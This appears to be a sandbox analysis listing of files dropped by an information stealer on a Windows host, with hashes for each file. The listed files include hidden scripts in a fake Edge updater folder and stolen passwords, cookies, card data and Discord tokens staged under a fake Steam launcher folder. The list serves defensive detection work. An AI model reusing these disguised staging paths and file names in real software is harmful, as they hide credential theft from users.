SHA512 52c426960baf3f7373f1c1a395476f13384ac577f24ec8e82bbf224342c54db3824a523e847d7e58eebbc34a0576499701b892e89c791b6029a02f55ea9f98cf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

MD5 242305cfa742970f2f3c4708b0eaac45
SHA1 33999ee6f04281ffb8cc33f7dc9fef0a4ae54c0a
SHA256 f3f7ba96694df6b5309dadda3d9c8682d134fa2ec5713339f69602ee8dc6e59d
SHA512 5b58d8c3b95c61347dc23c144b648241e5896a88e31da04bf20f367f95ee81026eeb62e00cbefc75e46909b1d66273631537c93f8a6e9a3ef7c8d55955a0028f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 321d57fccee188820bd2d061279ef76b
SHA1 8c5c83ffe3579529e091b79333adf3e67b18077e
SHA256 d2a97bdb5fddb22462e56382db24e2e01aff52cde524d55b7b7617a53c607709
SHA512 fd5b49c272dc22d5e2332ee6b0d5d88877ac96af3803a77e4b327d8884869fc68e1ed0a978660d149b85b19c5c09b39caba100db5087c4a50ce3820c7a66ffa5

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

MD5 a8834c224450d76421d8e4a34b08691f
SHA1 73ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

C:\ProgramData\edge\Updater\RunBatHidden.vbs

MD5 14a9867ec0265ebf974e440fcd67d837
SHA1 ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256 cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA512 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

MD5 3dc18365d12c9d00b5e2ab37b05f4bf1
SHA1 4b43f9f249bb7c00ca94f1d2d593882808d9f09d
SHA256 2469ae66e24a8d4b8196c511927400745cb05daf63eaf315390c6e7027ab9bc9
SHA512 08e39debe9eed49343e5ef855197e0c3b62783a5ae27ab96343ae4b109af809fab356cb42051e1a9f4b1b205bb92ec0f03b9c77e7a765773ed4464cc263fe01e

\??\c:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.cmdline

MD5 0e7c4010cfe49d314f8c16f50a9a5209
SHA1 902709ff43d3ee8320f8981b232867cc5722400c
SHA256 2e5d4e70ee8df06be8bdb2c2e98bdd1c2aeed3d61f35ac6b75ec0225452d4599
SHA512 5a07d6ed360f8a8fedefc6ab0e6ba3c8af3122c42acd6409dd24ea609b7d9244b2b34615eaaa10e98ce53d6106644edc7bbe73c1f6ad8797894b166ab582a5dc

\??\c:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.0.cs

MD5 b462a7b0998b386a2047c941506f7c1b
SHA1 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

\??\c:\Users\Admin\AppData\Local\Temp\alkib1u5\CSC7E947611C34014BACF222DB2E44B9.TMP

MD5 92a4dc443a97ad574316e0a549a0cf5f
SHA1 ba852dff28a91bdc44db4a428988c6811c18928f
SHA256 cb78bb0231033a90db4ce0211e7286ff88f1ae33e00d513ae867ff9a2d774621
SHA512 3568587690b62f9c28d2308dfae93afdeead67fec686204be7a565e76c1effd8152a01c5933238a0b2d7bd7f3324a924507d42eeeb4d5ccb329c1012df726e74

C:\Users\Admin\AppData\Local\Temp\RES5EE4.tmp

MD5 1100d83892f4910633efc703fbc81bfe
SHA1 21211280d3d4bf8010ccad600d837be03e48a014
SHA256 539556057c52dd182667f3eea7ac6f3a231d1a1dba1e1d10c231133d10a651ab
SHA512 e144ad975a43bb78af033cf8de8afbf2c4a346eab5db083c9cf2a52fc564b375bddc5759a1f700c5379149c79ba94237f66b87d6ae2766820c16d7e0cd8bf5f6

C:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.dll

MD5 b833658801fbad7f04e700d2545bf541
SHA1 e6a51620d1eb0242f256ff0a3096cda045f5b232
SHA256 4bfd6bf062139a5ce455aee439fca2a7fca7779379445552e59b87a4d330dd05
SHA512 e3131cc17c57f9e653bba92a0e9beccfb9719858fd0ed1c6709014b0b3eafa397c7d561e58e1d7d9df7f2e217ad4b36629c6f0e1f7c8c69cd29fc01bf46a8696

memory/676-424-0x00000263AC350000-0x00000263AC358000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 39669e209b0ec52df5c516d4112178e9
SHA1 006ef55f6f5912a60a823776fb2d3476f5df4986
SHA256 b3b27bee0c324a6a84ecef0fe783eb73f9091528c6abffa6f3f836b4464856b1
SHA512 2809f7f640088cdce83c1c54dfad4eae9e635b9c3feb8467bd7e5ee20da3b0d02d9f90c0c79f1d2a6e7752e582a2e0c46bc2646ab87d547e8ccbc420341a8920

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4093e5ab3812960039eba1a814c2ffb0
SHA1 b5e4a98a80be72fccd3cc910e93113d2febef298
SHA256 c0794e2b7036ce5612446a8b15e0c8387773bbc921f63cf8849f8a1f4ef3878c
SHA512 f3555b45aa1a1dd5214716dc81a05905c4ecd5a3e1276d35e08c65623ab1d14d469b3b576a5d9638264c1222d73889d2cc1ee43fb579d9ca3fcddd9f557cac7b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d5ed044e4f1e21179db39ad1fb6ca742
SHA1 3676af58ce6e48caa088d36a7837924f82a71d6e
SHA256 e89e1b210c5f2851508e7dba182fc4be83655b67197200f413fdbe21be0ab951
SHA512 97f9c523b46ec6dd02c20dd99c9313976f3b000231ceca724acf96be0f9075da0b72c91d415ee7e54118dca03c7bf0b97d986299656baa037a519ab7ad06df07

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Cards\Cards.txt

MD5 8a0ed121ee275936bf62b33f840db290
SHA1 898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA512 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Autofills\Autofills.txt

MD5 2f308e49fe62fbc51aa7a9b987a630fe
SHA1 1b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256 d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512 c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Cookies\Google_Default.txt

MD5 31f1018f819e256b1f5f0ba7f79b01aa
SHA1 50a1347671e5d4d0a8e0b0b178b7b3f9fec82fc7
SHA256 fddf657f6d965c785b36ab884411b6962b1666d81f4498ee4e669200527f4e9b
SHA512 59b3851872e5a1927981b06df676ddeca96b790aed7fc91df4a96e31124efd39c714141fe171406a682fcdaf98f427fc6fdc5e6e61a2844359e4c9246d9e2666

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\stolen_files.zip

MD5 86d0930e16b26906bf16e067615cbf4b
SHA1 0a31e8db6f2f8890d02ef24407abd8d1f28bdae6
SHA256 411a3bb92266ca00919c0e0346ac1e560723cee3fab2a78b0b9bf532bb0b1752
SHA512 cfc0bf6a1036d9a2770a418e8d81ae4ea13b6f4efdf8c9d86b79f5e91dec5b8d60dc6fc32edfef9fdfd8d121d5216362302733d013af919f8e1b6281c1901ff0

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Serial-Check.txt

MD5 b9874175566620121d427b868e7e8b53
SHA1 5b2086713a50b8de472a5f5d4dd8da6e7fe00291
SHA256 e3017d6c964d9f70232b99c31335286159a82f2d270ffe45f46c72ca457c633b
SHA512 56028c278c867794390f6ae2c8361f376c6b3bd4a206d3e12ca61cdbb90781e9b4d7d63986a537f62ce7ee8bffe8fe53edd2aec7e7b44770e43b0202a9c99435

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Passwords\Passwords.txt

MD5 c5e74f3120dbbd446a527e785dfe6d66
SHA1 11997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256 e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512 a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Discord\discord.txt

MD5 675951f6d9d75fd2c9c06b5ff547c6fd
SHA1 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA256 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA512 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\debug.log

MD5 425a0aa96a983ab490c8196389547158
SHA1 ad3879364ea013676b9b0f44db62c627fe5ad34c
SHA256 29350a26de3566a3f4419b6dd514df85517a866548088ad40802f865abac5944
SHA512 6d501174e4ef722c76fe8807487e0b6c7891fc2b2495297a43707f9e65c189a70e8f0153acf493a999616b208a73192d6bd7c73b1eee4f6f9f9191bc592b04ba

C:\ProgramData\Steam\Launcher\EN-Aoyvszio.zip

MD5 ab5f50cf9d53729e59567270f44c973a
SHA1 1fcbbb085eebb323ff5f18a6e936c12079b4fe78
SHA256 2e04667013ac5f9c6b463623e3fed0ad342930fbd9ed950b32ca4dfec3c74c50
SHA512 81e020463e25c0392bb920d6a9677d29478985724533d7588c23429e0e9266ae22d33080f253b5911e21b8e83f0a4ba833c712ea1bbf7827b095eb938623053c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

MD5 3a4319f4c31d7a7124b5ce79395a6f24
SHA1 face51cf7e0a0b8220084251bf686ee4c68058b7
SHA256 e1af6bff2e0d7eaca0fa3498e2b23f4da02d6d2369c222f2534d186232fb7dbe
SHA512 4aae8eb857e52119c36317ce60159bebc4fc6496bf6b16a0a8eac5bbcefca27070614edef8419aa81bf53acb5370e7487aaae0b7799e6631c2c82b2b980fc6fe

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8baa55f4c9614712ef2edb673b84f197
SHA1 f95f528a8dbff1c7c8abbc320633ad0ec097c902
SHA256 e2f3a14489a2526cb4341b9e7220531e1f46c861ea11d0a1ed17c901f6a1bee3
SHA512 899e33b413570a0a5008367e4286b675325635da89f5271c8b466ffd748c23066e96ec379532b2045c258114a9f3cbb202f32320b3769e414bb768119ec39cc3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b